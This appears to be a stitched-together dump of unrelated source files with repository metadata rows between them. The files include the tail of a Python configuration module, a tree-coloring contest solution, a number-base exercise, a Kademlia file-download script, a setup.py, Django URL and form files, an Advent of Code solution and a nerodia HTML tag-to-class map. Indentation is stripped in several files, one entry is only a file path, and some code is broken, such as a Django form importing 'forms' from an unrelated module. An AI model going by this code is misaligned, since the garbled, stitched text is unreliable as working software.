# matched keys is the primary key
pass
return typed_values, validation_errors
def validate_all(self):
validation_errors = list(chain.from_iterable(self.check_source(source)[1]
for source in self.raw_data))
raise_errors(validation_errors)
self.validate_configuration()
@staticmethod
def _collect_validation_error(func, *args, **kwargs):
try:
func(*args, **kwargs)
except ConfigurationError as e:
return e.errors if hasattr(e, 'errors') else e,
return ()
def validate_configuration(self):
errors = chain.from_iterable(Configuration._collect_validation_error(getattr, self, name)
for name in self.parameter_names)
post_errors = self.post_build_validation()
raise_errors(tuple(chain.from_iterable((errors, post_errors))))
def post_build_validation(self):
return ()
def collect_all(self):
typed_values = odict()
validation_errors = odict()
for source in self.raw_data:
typed_values[source], validation_errors[source] = self.check_source(source)
raise_errors(tuple(chain.from_iterable(itervalues(validation_errors))))
return odict((k, v) for k, v in iteritems(typed_values) if v)
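# ---------------------------------------------------------------------------
# Editor's addition -- a minimal usage sketch, not part of the original
# module. The subclass, parameter names, and app name below are hypothetical;
# they only illustrate how Configuration and the Parameter descriptors fit
# together: declare parameters as class attributes, then read them back as
# ordinary attributes once the instance has loaded its sources.
class _ExampleConfiguration(Configuration):
    always_yes = PrimitiveParameter(False, aliases=('yes',))
    channels = SequenceParameter(string_types, default=('defaults',))
    proxy_servers = MapParameter(string_types)
if __name__ == '__main__':  # pragma: no cover
    _example = _ExampleConfiguration(search_path=(), app_name='example')
    _example.validate_all()
    print(_example.always_yes, _example.channels, _example.proxy_servers)
# ---------------------------------------------------------------------------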
| [
"[email protected]"
]
| |
e9a512b76683460e70e8f31c4ae4f2d4f5144fb0 | 62c613e1f2bf062f807294ec6da4ae35bda6ac86 | /abc146-d.py | 195a5dc74cc33e8cfd7bc84c234a493644e42d2a | []
| no_license | teru01/python_algorithms | 6b463c78c801b68f93dda2be2f67c9688dc3cc07 | 8feb194f53b619ab7b9c964a32df7b4df32b6f2e | refs/heads/master | 2020-06-11T02:33:27.939830 | 2020-04-27T01:32:37 | 2020-04-27T01:32:37 | 193,827,088 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,178 | py | import sys
input = sys.stdin.readline
from operator import itemgetter
sys.setrecursionlimit(10000000)
INF = 10**30
from collections import deque
def main():
n = int(input().strip())
G = [[] for _ in range(n)]
A = [0] * n
B = [0] * n
for i in range(n-1):
a, b = list(map(int, input().strip().split()))
A[i] = a
B[i] = b
G[a-1].append([b-1, 0])
G[b-1].append([a-1, 0])
root = 0
mlen = len(G[0])
for i in range(n):
if mlen < len(G[i]):
mlen = len(G[i])
root = i
nodes = [0] * n
q = deque()
q.append((root, -1))
while len(q) > 0:
v, fr = q.popleft()
for y, (w, _) in enumerate(G[v]):
color = 1
if w != fr:
if fr == -1:
print(v, w)
G[v][y][1] = color
elif G[v][fr][1] != color:
G[v][y][1] = color
else:
color += 1
G[v][w][1] = color
q.append((w, v))
color += 1
for i in range(n):
print(G[i])
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
efa66284d47dc7d43341155eaa34d87506ce3814 | 982344011a248b0f514ffb8d0c87c13f2f2e113e | /day1/conv.py | a03b4d03b507ada57975e15de49aabf5b16b5d56 | []
| no_license | patrickjwolf/CS32_Architecture_GP | 7f6c68de92155b7b9b295f7d35413637cebce45a | 8704add1c6ed1f917451544e1573bed005eaa3ac | refs/heads/master | 2022-12-06T15:26:54.715887 | 2020-08-19T22:45:21 | 2020-08-19T22:45:21 | 288,225,480 | 0 | 0 | null | 2020-08-17T16:05:34 | 2020-08-17T16:05:33 | null | UTF-8 | Python | false | false | 2,567 | py | # In general, the `.format` method is considered more modern than the printf `%`
# operator.
# num = 123
# # Printing a value as decimal
# print(num) # 123
# print("%d" % num) # 123
# print("{:d}".format(num)) # 123
# print(f"{num:d}") # 123
# # Printing a value as hex
# print(hex(num)) # 0x7b
# print("%x" % num) # 7b
# print("%X" % num) # 7B
# print("%04X" % num) # 007B
# print(f"{num:x}") # 7b
# print(f"{num:X}") # 7B
# print(f"{num:04x}") # 007b
# # Printing a value as binary
# print("{:b}".format(num)) # 1111011, format method
"""
take input as a string
1111011
take input string
7b
turn in to a list
[1, 1, 1, 1, 0, 1, 1]
[7, b]
reverse the list
[1, 1, 0, 1, 1, 1, 1]
[b, 7]
multiply each element by its power of 2 respectively
1 * 1
1 * 2
0 * 4
1 * 8
1 * 16
1 * 32
1 * 64
b * 1 => 11
7 * 16 => 112
# take the numbers and add them together
1 + 2 + 0 + 8 + 16 + 32 + 64
3 + 8 + 16 + 32 + 64
11 + 16 + 32 + 64
27 + 32 + 64
59 + 64
11 + 112
# returning a result in decimal
123
123
"""
# # Converting a decimal number in a string to a value
# s = "1234"; # 1234 is 0x4d2
# x = int(s); # Convert base-10 string to value
# # Printing a value as decimal and hex
# print(num) # 1234
# print(f"{num:x}") # 4d2
# # Converting a binary number in a string to a value
# s = "100101" # 0b100101 is 37 is 0x25
# x = int(s, 2) # Convert base-2 string to value
# # Printing a value as decimal and hex
# print(num) # 37
# print(f"{num:x}") # 25
# Conversion Python code:
# string1 = "10101010"
# 1 * 128
# 0 * 64
# 1 * 32
# 0 * 16
# 1 * 8
# 0 * 4
# 1 * 2
# 0 * 1
# reverse_string1 = "01010101"
# loop from 0 -> size of list - 1
# index = 0 -> 7
# base = 2
# base ** index
# 2 ** 0 => 1
# 2 ** 1 => 2
# 2 ** 2 => 4
# 2 ** 3 => 8
# 2 ** 4 => 16
# 2 ** 5 => 32
# 2 ** 6 => 64
# 2 ** 7 => 128
# multiplyer = 1 -> 128
# 0 * multiplyer
# 0 * 1 = 0
# 1 * 2 = 2
# 0 * 4 = 0
# 1 * 8 = 8
# 0 * 16 = 0
# 1 * 32 = 32
# 0 * 64 = 0
# 1 * 128 = 128
# value = 0
# value += 0
# value += 2
# value += 0
# value += 8
# value += 0
# value += 32
# value += 0
# value += 128
# ret value => 170
# [1, 0, 1, 0, 1, 0, 1, 0]
# [0, 1, 0, 1, 0, 1, 0, 1]
# digit_list[i] == 0
# + 0 * 1
# 0
# + 1 * 2
# 2
# 128 + 32 + 8 + 2
# Let's convert different bases to decimal
def to_decimal(num_string, base):
    # walk the digits right-to-left, as sketched in the notes above:
    # value += digit * multiplier, with the multiplier growing by `base`
    value, multiplier = 0, 1
    for char in reversed(num_string.lower()):
        value += "0123456789abcdefghijklmnopqrstuvwxyz".index(char) * multiplier
        multiplier *= base
    return value
print(to_decimal("7b", 16)) # => 123
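# Editor's note (illustrative cross-check, not part of the original exercise):
# Python's built-in int() already accepts an explicit base, so it can be used
# to double-check a hand-rolled converter like to_decimal().
assert int("7b", 16) == 123
assert int("1111011", 2) == 123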
print(to_decimal("010111010110101", 2)) # => 11957 | [
"[email protected]"
]
| |
5cd04361f26f5da04f4dd9f697d57ab51f7e0f1d | 66cab93c26cc252f412860778131b208c6f120be | /parts/newproject/webob/acceptparse.py | df3db6b411f45e2366c6215b630c553c1de21ec3 | []
| no_license | marcogarzini/Zodiac | 3332733f6ae8d64924557ff022f44c835aeac0a9 | 06e8ad0c709189dc65a26fb7d6c17a9ee2bc9112 | refs/heads/master | 2016-09-11T03:18:12.805299 | 2014-01-17T12:50:03 | 2014-01-17T12:50:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 70 | py | /home/user1/newproject/eggs/WebOb-1.2.3-py2.7.egg/webob/acceptparse.py | [
"user1@user1-VirtualBox.(none)"
]
| user1@user1-VirtualBox.(none) |
3c62b147291c14be369f9d73ced805f7f8773c2f | 5044413a31d50b8220c87ae02acc7b059c7bf5ec | /T2/KademliaLibrary/example/download.py | 4be810183d08324cbd67d47e8459bd7b3f0cb044 | []
| no_license | rjherrera/IIC2523 | 500540350d06a1d11866093ec8d5df984728875c | 756c4a3d9a59d72f66280333c8b48536c03ab592 | refs/heads/master | 2020-03-28T00:25:53.312660 | 2017-12-13T19:06:41 | 2017-12-13T19:06:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | from kademlia_iic2523.ipc import ipcSend
import requests
import socket
import sys
FILES_FOLDER = '/user/rjherrera/T2/files'
def download(url):
    # try as we may receive unexpected things. Also to use a friendly way of showing errors
try:
# use the requests library to try to download the file
r = requests.get(url, stream=True)
if r.status_code == 200:
# if we can we dump it to the desired location
with open('%s/%s' % (FILES_FOLDER, sys.argv[1]), 'wb') as f:
for chunk in r.iter_content(1024):
f.write(chunk)
return True
raise Exception(r.status_code)
except Exception as error:
print(error)
return False
def onResponse(message):
ip_address = socket.gethostbyname(socket.gethostname())
for url in message:
if download(url):
node_url = 'http://%s:11009/%s' % (ip_address, sys.argv[1])
# 'set' the file in our location (node_url) -> we are now registered as a server for it
ipcSend('set %s %s' % (sys.argv[1], node_url))
return
print('File not downloaded.')
ipcSend('get %s' % sys.argv[1], onResponse)
| [
"[email protected]"
]
| |
2b206bd77e2c71810ed891c15081bb40dd02a4af | c05357142b9f112d401a77f9610079be3500675d | /danceschool/core/urls.py | acc3ba46762b7690b07c61b675bf598fcdb0daac | [
"BSD-3-Clause"
]
| permissive | NorthIsUp/django-danceschool | b3df9a9373c08e51fcaa88751e325b6423f36bac | 71661830e87e45a3df949b026f446c481c8e8415 | refs/heads/master | 2021-01-02T22:42:17.608615 | 2017-08-04T17:27:37 | 2017-08-04T17:27:37 | 99,373,397 | 1 | 0 | null | 2017-08-04T19:21:50 | 2017-08-04T19:21:50 | null | UTF-8 | Python | false | false | 2,997 | py | from django.conf.urls import url
from django.contrib import admin
from .feeds import EventFeed, json_event_feed
from .views import SubmissionRedirectView, InstructorStatsView, OtherInstructorStatsView, IndividualClassView, IndividualEventView, StaffDirectoryView, EmailConfirmationView, SendEmailView, SubstituteReportingView, InstructorBioChangeView, AccountProfileView, OtherAccountProfileView
from .ajax import UserAccountInfo, updateSeriesAttributes, getEmailTemplate
from .autocomplete_light_registry import CustomerAutoComplete, UserAutoComplete
admin.autodiscover()
urlpatterns = [
# These URLs are for Ajax and autocomplete functionality
url(r'^staff/substitute/filter/$', updateSeriesAttributes, name='ajaxhandler_submitsubstitutefilter'),
url(r'^staff/sendemail/template/$', getEmailTemplate, name='ajaxhandler_getemailtemplate'),
url(r'^staff/autocomplete/user', UserAutoComplete.as_view(), name='autocompleteUser'),
url(r'^staff/autocomplete/customer', CustomerAutoComplete.as_view(), name='autocompleteCustomer'),
url(r'^accounts/info/$', UserAccountInfo.as_view(), name='getUserAccountInfo'),
# For general admin form submission redirects
url(r'^form/submitted/$', SubmissionRedirectView.as_view(), name='submissionRedirect'),
url(r'^staff/directory/$',StaffDirectoryView.as_view(),name='staffDirectory'),
url(r'^staff/sendemail/$', SendEmailView.as_view(),name='emailStudents'),
url(r'^staff/sendemail/confirm/$', EmailConfirmationView.as_view(),name='emailConfirmation'),
url(r'^staff/substitute/$', SubstituteReportingView.as_view(),name='substituteTeacherForm'),
# These provide the ability to view one's own stats or another instructor's stats
url(r'^staff/instructor-stats/(?P<first_name>[\w\+\.]+)-(?P<last_name>[\w\+\.]+)/$', OtherInstructorStatsView.as_view(), name='instructorStats'),
url(r'^staff/instructor-stats/$', InstructorStatsView.as_view(), name='instructorStats'),
# This provides the ability to edit one's own bio
url(r'^staff/bio/$', InstructorBioChangeView.as_view(), name='instructorBioChange'),
# These are for the calendar feeds
url(r'^events/feed/$', EventFeed(), name='calendarFeed'),
url(r'^events/feed/json/$', json_event_feed, name='jsonCalendarFeed'),
url(r'^events/feed/(?P<instructorFeedKey>[\w\-_]+)$', EventFeed(), name='calendarFeed'),
url(r'^events/feed/json/(?P<instructorFeedKey>[\w\-_]+)$', json_event_feed, name='jsonCalendarFeed'),
# These are for individual class views and event views
url(r'^classes/(?P<year>[0-9]+)/(?P<month>[\w]+)/(?P<slug>[\w\-_]+)/$', IndividualClassView.as_view(), name='classView'),
url(r'^events/(?P<year>[0-9]+)/(?P<month>[\w]+)/(?P<slug>[\w\-_]+)/$', IndividualEventView.as_view(), name='eventView'),
url(r'^accounts/profile/(?P<user_id>[0-9]+)/$', OtherAccountProfileView.as_view(), name='accountProfile'),
url(r'^accounts/profile/$', AccountProfileView.as_view(), name='accountProfile'),
]
| [
"[email protected]"
]
| |
c32bf7266de063e1e276f4b6ab28ed930165b860 | 9f7d4d76c7e66aa424a5f8723575dc489f1fd2ab | /2022/15/15.py | 7d6fdb456fc09a05011e86519edbfcdeac7af504 | [
"MIT"
]
| permissive | kristianwiklund/AOC | df5a873287304816f25d91259c6e6c99c7a5f4bf | d9a668c406d2fd1b805d9b6a34cffa237a33c119 | refs/heads/master | 2023-01-12T09:01:11.012081 | 2023-01-02T19:12:29 | 2023-01-02T19:12:29 | 227,458,380 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,007 | py | import sys
sys.path.append("../..")
from utilities import *
import networkx as nx
from copy import deepcopy
from pprint import pprint
arr = readarray("input.txt")
row = 2000000
#row=10
beac=list()
sens=list()
for l in arr:
x=int(l[2].split("=")[1].strip(","))
y=int(l[3].split("=")[1].strip(":"))
s=complex(x,y)
# print(s)
sens.append(s)
x=int(l[8].split("=")[1].strip(","))
y=int(l[9].split("=")[1].strip(":"))
b=complex(x,y)
# print(b)
beac.append(b)
print(sens)
# for each beacon
# identify the lines defining the area of the relevant beacon coverage
# project those lines on the line we want to look at
# the length of the line grows with +1 on each side from the center for each row above the furthest row
# the result is a set of lines showing what is covered
def cover(s,b,l):
d = int(abs(s.imag-b.imag)+abs(s.real-b.real))
if int(s.imag+d)<l:
return None
# d is the max distance where we have guaranteed no other beacons
# at that place, we have one single blob right below the sensor
# at position (s.real, s.imag+d)
# for each distance above this, we get an additional blob on the
# side
side = d-abs(s.imag-l)
if(side<0):
return None
# print("cover",s,b,"(s)",side,"<<",d,">>",(s.real - abs(side), s.real + abs(side)))
return (s.real - abs(side), s.real + abs(side))
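# Editor's note -- illustrative sanity check (uses the sensor/beacon pair
# (8,7)/(2,10) from the puzzle's worked example): distance 9, so on row 10
# the covered interval is x = 2..14.
assert cover(complex(8, 7), complex(2, 10), 10) == (2, 14)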
def lineme(row):
line=list()
for i in range(len(sens)):
c = cover(sens[i],beac[i],row)
if c:
line.append(c)
line=sorted(line,key=lambda x:x[0])
return line
#print(mi,ma)
def yes(x, line):
for i in line:
if x>=i[0] and x<=i[1]:
return True
return False
def scoreme(line, maxx=None):
score=0
ma = max([int(y) for x,y in line])
if maxx:
ma = max(maxx,ma)
mi = min([int(x) for x,y in line])
for i in range(mi,ma):
if yes(i,line):
score+=1
if (ma-mi)<80:
print("#",end="")
else:
if (ma-mi)<80:
print(".",end="")
return score
print("")
line = lineme(row)
print("part 1:",scoreme(line))
def overlap(a,b):
if a==b:
return True
if a[0]>=b[0] and a[1]<=b[1]:
return True
else:
return False
def cm(a,b):
if a==b:
return 0
if a[0]==b[0]:
if a[1]==b[1]:
return 0
if a[1]<b[1]:
return -1
return 1
if a[0]<b[0]:
return -1
return 1
from functools import cmp_to_key
for i in range(0,4000000):
line = lineme(i)
line= sorted(list(line),key=cmp_to_key(cm))
x=0
for j in line:
if j[0]<x:
if j[1]<x:
continue
if j[0]-x == 2:
print ("part 2:", i+(x+1)*4000000,line)
import sys
sys.exit()
x=j[1]
if x>4000000:
break
| [
"[email protected]"
]
| |
d2c84ea4ee599a3dca31d420a60f2e17b98158a9 | fa2526ce1d65a2e58958a61c34cee1ba7cf73b94 | /setup.py | 958cccc8103c3d1f18213fd6d55c4f3cb9978257 | [
"ZPL-2.1"
]
| permissive | Zojax/zojax.portlets.livesearch | c480a19bd57b8b348032e40203696e4c53c68347 | 95f117ce89e0dc1fbfefdbec7969170caa3a1caf | refs/heads/master | 2020-12-30T10:36:43.760852 | 2011-08-09T22:33:26 | 2011-08-09T22:33:26 | 2,035,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,552 | py | ##############################################################################
#
# Copyright (c) 2008 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Setup for zojax.portlets.livesearch package
$Id$
"""
import sys, os
from setuptools import setup, find_packages
def read(*rnames):
return open(os.path.join(os.path.dirname(__file__), *rnames)).read()
version='1.0.0dev'
setup(name = 'zojax.portlets.livesearch',
version = version,
author = 'Nikolay Kim',
author_email = '[email protected]',
      description = "Live search portlet",
long_description = (
'Detailed Documentation\n' +
'======================\n'
+ '\n\n' +
read('CHANGES.txt')
),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Zope Public License',
'Programming Language :: Python',
'Natural Language :: English',
'Operating System :: OS Independent',
'Topic :: Internet :: WWW/HTTP',
'Framework :: Zope3'],
url='http://zojax.net/',
license='ZPL 2.1',
packages=find_packages('src'),
package_dir = {'':'src'},
namespace_packages=['zojax', 'zojax.portlets'],
install_requires = ['setuptools', 'simplejson',
'zope.component',
'zope.interface',
'zope.schema',
'zope.i18nmessageid',
'zojax.catalog',
'zojax.portlet',
'zojax.ownership',
'zojax.formatter',
'zojax.ui.searching',
'zojax.js.extjs',
'zojax.resource',
'zojax.resourcepackage',
],
extras_require = dict(test=['zojax.portlet [test]']),
include_package_data = True,
zip_safe = False
)
| [
"[email protected]"
]
| |
74da8fcf18ff9a8150ba39ee90f91be05dea8255 | 0b70b9f582d2b010305ad1e5e4885f30435a5a74 | /GUEST/forms.py | ae9847e5b58e1badfbd1bde00f04d04ed4a557f7 | []
| no_license | SruthiSasidharan/DjangoProjects | 51fa60282b398f4ebf03383220ce046ae1e1beed | 6fccc3e1d571638949953ed9fc390068417ce713 | refs/heads/master | 2023-06-28T02:24:32.355568 | 2021-07-29T07:45:26 | 2021-07-29T07:45:26 | 370,647,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | from Guest import forms
from .models import Review
from django.forms import ModelForm
class ReviewCreateForm(forms.ModelForm):
class Meta:
model=Review
fields=["review"]
| [
"[email protected]"
]
| |
5be8330c7a2af0ba0d2b7752a2f74e9b0b078107 | f16e6cff9270ffece7f28473a46a49f76044eae1 | /data_and_proc/sp2genus.py | 4fcb8182b68b5087bea63b7412024f334e0a339a | []
| no_license | Klim314/pubcrawl | fe9e0a4ad0df35367a685856edb7983453fda345 | cd873d0741c6ed1a09867ce86077927afd7be450 | refs/heads/master | 2021-01-18T19:17:49.786829 | 2015-06-19T03:48:03 | 2015-06-19T03:48:03 | 35,801,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | #!/usr/bin/env python3
import sys
target = sys.argv[1]
output = sys.argv[2]
# keep only the first whitespace-separated token (the genus) from each of the
# two tab-separated name columns, and de-duplicate the resulting pairs
holder = set()
with open(target) as f:
for i in f:
splat = i.strip().split("\t")
holder.add((splat[0].split(' ')[0], splat[1].split(' ')[0]))
with open(output, 'w') as f:
for i in holder:
f.write(" ".join(i) + '\n')
| [
"[email protected]"
]
| |
549932aa539333a091f31dc81f22a937b394e990 | 62bf350adedcb1d04a97ca5e1f576e1f73493c53 | /nerodia/tag_map.py | 33d536cc6e637a42fc23f84dd48bd2271b1f0be7 | [
"MIT"
]
| permissive | mark0203/nerodia | 57ca4bdf36ee6d84b46fb177b6e385f6c82c164d | 2631c210fbaa0a7b5d598016e11ad7c7af083237 | refs/heads/master | 2020-05-24T00:44:25.189039 | 2019-03-10T00:41:51 | 2019-03-10T00:43:50 | 187,021,782 | 0 | 0 | MIT | 2019-05-16T19:46:54 | 2019-05-16T12:17:40 | Python | UTF-8 | Python | false | false | 14,862 | py | from nerodia import tag_to_class
from .elements.area import Area
from .elements.button import Button
from .elements.d_list import DList
from .elements.form import Form
from .elements.html_elements import HTMLElement, Audio, Base, Quote, Body, BR, Canvas, \
TableCaption, TableCol, Data, DataList, Mod, Details, Dialog, Div, Embed, FieldSet, FrameSet, \
Heading, Head, HR, Html, Label, Legend, LI, Map, Meta, Meter, Object, \
OptGroup, Output, Paragraph, Param, Pre, Progress, Script, Source, Span, Style, \
Template, TableHeaderCell, Time, Title, Track, Video, AnchorCollection, \
HTMLElementCollection, AreaCollection, AudioCollection, BaseCollection, QuoteCollection, \
BodyCollection, BRCollection, ButtonCollection, CanvasCollection, TableCaptionCollection, \
TableColCollection, DataCollection, DataListCollection, ModCollection, DetailsCollection, \
DialogCollection, DivCollection, DListCollection, EmbedCollection, FieldSetCollection, \
FormCollection, FrameSetCollection, HeadingCollection, HeadCollection, HRCollection, \
HtmlCollection, IFrameCollection, ImageCollection, InputCollection, \
LabelCollection, LegendCollection, LICollection, MapCollection, \
MetaCollection, MeterCollection, ObjectCollection, OListCollection, \
OptGroupCollection, OptionCollection, OutputCollection, ParagraphCollection, ParamCollection, \
PreCollection, ProgressCollection, ScriptCollection, SelectCollection, SourceCollection, \
SpanCollection, StyleCollection, TableDataCellCollection, TemplateCollection, TextAreaCollection, \
TableCollection, TableHeaderCellCollection, TableSectionCollection, TimeCollection, TitleCollection, \
TableRowCollection, TrackCollection, UListCollection, VideoCollection
from .elements.i_frame import IFrame
from .elements.image import Image
from .elements.input import Input
from .elements.link import Anchor
from .elements.list import OList, UList
from .elements.option import Option
from .elements.radio import Radio, RadioCollection
from .elements.radio_set import RadioSet
from .elements.select import Select
from .elements.svg_elements import Circle, CircleCollection, Defs, DefsCollection, Desc, \
DescCollection, Ellipse, EllipseCollection, ForeignObject, ForeignObjectCollection, G, \
GCollection, Line, LineCollection, LinearGradient, LinearGradientCollection, Marker, \
MarkerCollection, Metadata, MetadataCollection, Path, PathCollection, Pattern, \
PatternCollection, Polygon, PolygonCollection, Polyline, PolylineCollection, RadialGradient, \
RadialGradientCollection, Rect, RectCollection, Stop, StopCollection, SVG, SVGCollection, \
Switch, SwitchCollection, Symbol, SymbolCollection, TextPath, TextPathCollection, TSpan, \
TSpanCollection, Use, UseCollection, View, ViewCollection
from .elements.table import Table
from .elements.table_data_cell import TableDataCell
from .elements.table_row import TableRow
from .elements.table_section import TableSection
from .elements.text_area import TextArea
tag_to_class['a'] = Anchor
tag_to_class['a_collection'] = AnchorCollection
tag_to_class['link'] = Anchor
tag_to_class['link_collection'] = AnchorCollection
tag_to_class['abbr'] = HTMLElement
tag_to_class['abbr_collection'] = HTMLElementCollection
tag_to_class['address'] = HTMLElement
tag_to_class['address_collection'] = HTMLElementCollection
tag_to_class['area'] = Area
tag_to_class['area_collection'] = AreaCollection
tag_to_class['article'] = HTMLElement
tag_to_class['article_collection'] = HTMLElementCollection
tag_to_class['aside'] = HTMLElement
tag_to_class['aside_collection'] = HTMLElementCollection
tag_to_class['audio'] = Audio
tag_to_class['audio_collection'] = AudioCollection
tag_to_class['b'] = HTMLElement
tag_to_class['b_collection'] = HTMLElementCollection
tag_to_class['base'] = Base
tag_to_class['base_collection'] = BaseCollection
tag_to_class['bdi'] = HTMLElement
tag_to_class['bdi_collection'] = HTMLElementCollection
tag_to_class['bdo'] = HTMLElement
tag_to_class['bdo_collection'] = HTMLElementCollection
tag_to_class['blockquote'] = Quote
tag_to_class['blockquote_collection'] = QuoteCollection
tag_to_class['body'] = Body
tag_to_class['body_collection'] = BodyCollection
tag_to_class['br'] = BR
tag_to_class['br_collection'] = BRCollection
tag_to_class['button'] = Button
tag_to_class['button_collection'] = ButtonCollection
tag_to_class['canvas'] = Canvas
tag_to_class['canvas_collection'] = CanvasCollection
tag_to_class['caption'] = TableCaption
tag_to_class['caption_collection'] = TableCaptionCollection
tag_to_class['circle'] = Circle
tag_to_class['circle_collection'] = CircleCollection
tag_to_class['cite'] = HTMLElement
tag_to_class['cite_collection'] = HTMLElementCollection
tag_to_class['code'] = HTMLElement
tag_to_class['code_collection'] = HTMLElementCollection
tag_to_class['col'] = TableCol
tag_to_class['col_collection'] = TableColCollection
tag_to_class['colgroup'] = TableCol
tag_to_class['colgroup_collection'] = TableColCollection
tag_to_class['data'] = Data
tag_to_class['data_collection'] = DataCollection
tag_to_class['datalist'] = DataList
tag_to_class['datalist_collection'] = DataListCollection
tag_to_class['dd'] = HTMLElement
tag_to_class['dd_collection'] = HTMLElementCollection
tag_to_class['defs'] = Defs
tag_to_class['defs_collection'] = DefsCollection
tag_to_class['del'] = Mod
tag_to_class['del_collection'] = ModCollection
tag_to_class['delete'] = Mod
tag_to_class['delete_collection'] = ModCollection
tag_to_class['desc'] = Desc
tag_to_class['desc_collection'] = DescCollection
tag_to_class['details'] = Details
tag_to_class['details_collection'] = DetailsCollection
tag_to_class['dfn'] = HTMLElement
tag_to_class['dfn_collection'] = HTMLElementCollection
tag_to_class['dialog'] = Dialog
tag_to_class['dialog_collection'] = DialogCollection
tag_to_class['div'] = Div
tag_to_class['div_collection'] = DivCollection
tag_to_class['dl'] = DList
tag_to_class['dl_collection'] = DListCollection
tag_to_class['dt'] = HTMLElement
tag_to_class['dt_collection'] = HTMLElementCollection
tag_to_class['ellipse'] = Ellipse
tag_to_class['ellipse_collection'] = EllipseCollection
tag_to_class['em'] = HTMLElement
tag_to_class['em_collection'] = HTMLElementCollection
tag_to_class['embed'] = Embed
tag_to_class['embed_collection'] = EmbedCollection
tag_to_class['fieldset'] = FieldSet
tag_to_class['fieldset_collection'] = FieldSetCollection
tag_to_class['figcaption'] = HTMLElement
tag_to_class['figcaption_collection'] = HTMLElementCollection
tag_to_class['figure'] = HTMLElement
tag_to_class['figure_collection'] = HTMLElementCollection
tag_to_class['footer'] = HTMLElement
tag_to_class['footer_collection'] = HTMLElementCollection
tag_to_class['foreignObject'] = ForeignObject
tag_to_class['foreignObject_collection'] = ForeignObjectCollection
tag_to_class['form'] = Form
tag_to_class['form_collection'] = FormCollection
tag_to_class['frameset'] = FrameSet
tag_to_class['frameset_collection'] = FrameSetCollection
tag_to_class['g'] = G
tag_to_class['g_collection'] = GCollection
tag_to_class['h1'] = Heading
tag_to_class['h1_collection'] = HeadingCollection
tag_to_class['h2'] = Heading
tag_to_class['h2_collection'] = HeadingCollection
tag_to_class['h3'] = Heading
tag_to_class['h3_collection'] = HeadingCollection
tag_to_class['h4'] = Heading
tag_to_class['h4_collection'] = HeadingCollection
tag_to_class['h5'] = Heading
tag_to_class['h5_collection'] = HeadingCollection
tag_to_class['h6'] = Heading
tag_to_class['h6_collection'] = HeadingCollection
tag_to_class['head'] = Head
tag_to_class['head_collection'] = HeadCollection
tag_to_class['header'] = HTMLElement
tag_to_class['header_collection'] = HTMLElementCollection
tag_to_class['hgroup'] = HTMLElement
tag_to_class['hgroup_collection'] = HTMLElementCollection
tag_to_class['hr'] = HR
tag_to_class['hr_collection'] = HRCollection
tag_to_class['html'] = Html
tag_to_class['html_collection'] = HtmlCollection
tag_to_class['i'] = HTMLElement
tag_to_class['i_collection'] = HTMLElementCollection
tag_to_class['ital'] = HTMLElement
tag_to_class['ital_collection'] = HTMLElementCollection
tag_to_class['iframe'] = IFrame
tag_to_class['iframe_collection'] = IFrameCollection
tag_to_class['img'] = Image
tag_to_class['img_collection'] = ImageCollection
tag_to_class['input'] = Input
tag_to_class['input_collection'] = InputCollection
tag_to_class['ins'] = Mod
tag_to_class['ins_collection'] = ModCollection
tag_to_class['kbd'] = HTMLElement
tag_to_class['kbd_collection'] = HTMLElementCollection
tag_to_class['label'] = Label
tag_to_class['label_collection'] = LabelCollection
tag_to_class['legend'] = Legend
tag_to_class['legend_collection'] = LegendCollection
tag_to_class['li'] = LI
tag_to_class['li_collection'] = LICollection
tag_to_class['line'] = Line
tag_to_class['line_collection'] = LineCollection
tag_to_class['linearGradient'] = LinearGradient
tag_to_class['linearGradient_collection'] = LinearGradientCollection
tag_to_class['main'] = HTMLElement
tag_to_class['main_collection'] = HTMLElementCollection
tag_to_class['map'] = Map
tag_to_class['map_collection'] = MapCollection
tag_to_class['mark'] = HTMLElement
tag_to_class['mark_collection'] = HTMLElementCollection
tag_to_class['marker'] = Marker
tag_to_class['marker_collection'] = MarkerCollection
tag_to_class['meta'] = Meta
tag_to_class['meta_collection'] = MetaCollection
tag_to_class['metadata'] = Metadata
tag_to_class['metadata_collection'] = MetadataCollection
tag_to_class['meter'] = Meter
tag_to_class['meter_collection'] = MeterCollection
tag_to_class['nav'] = HTMLElement
tag_to_class['nav_collection'] = HTMLElementCollection
tag_to_class['noscript'] = HTMLElement
tag_to_class['noscript_collection'] = HTMLElementCollection
tag_to_class['object'] = Object
tag_to_class['object_collection'] = ObjectCollection
tag_to_class['ol'] = OList
tag_to_class['ol_collection'] = OListCollection
tag_to_class['optgroup'] = OptGroup
tag_to_class['optgroup_collection'] = OptGroupCollection
tag_to_class['option'] = Option
tag_to_class['option_collection'] = OptionCollection
tag_to_class['output'] = Output
tag_to_class['output_collection'] = OutputCollection
tag_to_class['p'] = Paragraph
tag_to_class['p_collection'] = ParagraphCollection
tag_to_class['path'] = Path
tag_to_class['path_collection'] = PathCollection
tag_to_class['param'] = Param
tag_to_class['param_collection'] = ParamCollection
tag_to_class['pattern'] = Pattern
tag_to_class['pattern_collection'] = PatternCollection
tag_to_class['polygon'] = Polygon
tag_to_class['polygon_collection'] = PolygonCollection
tag_to_class['polyline'] = Polyline
tag_to_class['polyline_collection'] = PolylineCollection
tag_to_class['pre'] = Pre
tag_to_class['pre_collection'] = PreCollection
tag_to_class['progress'] = Progress
tag_to_class['progress_collection'] = ProgressCollection
tag_to_class['q'] = Quote
tag_to_class['q_collection'] = QuoteCollection
tag_to_class['radialGradient'] = RadialGradient
tag_to_class['radialGradient_collection'] = RadialGradientCollection
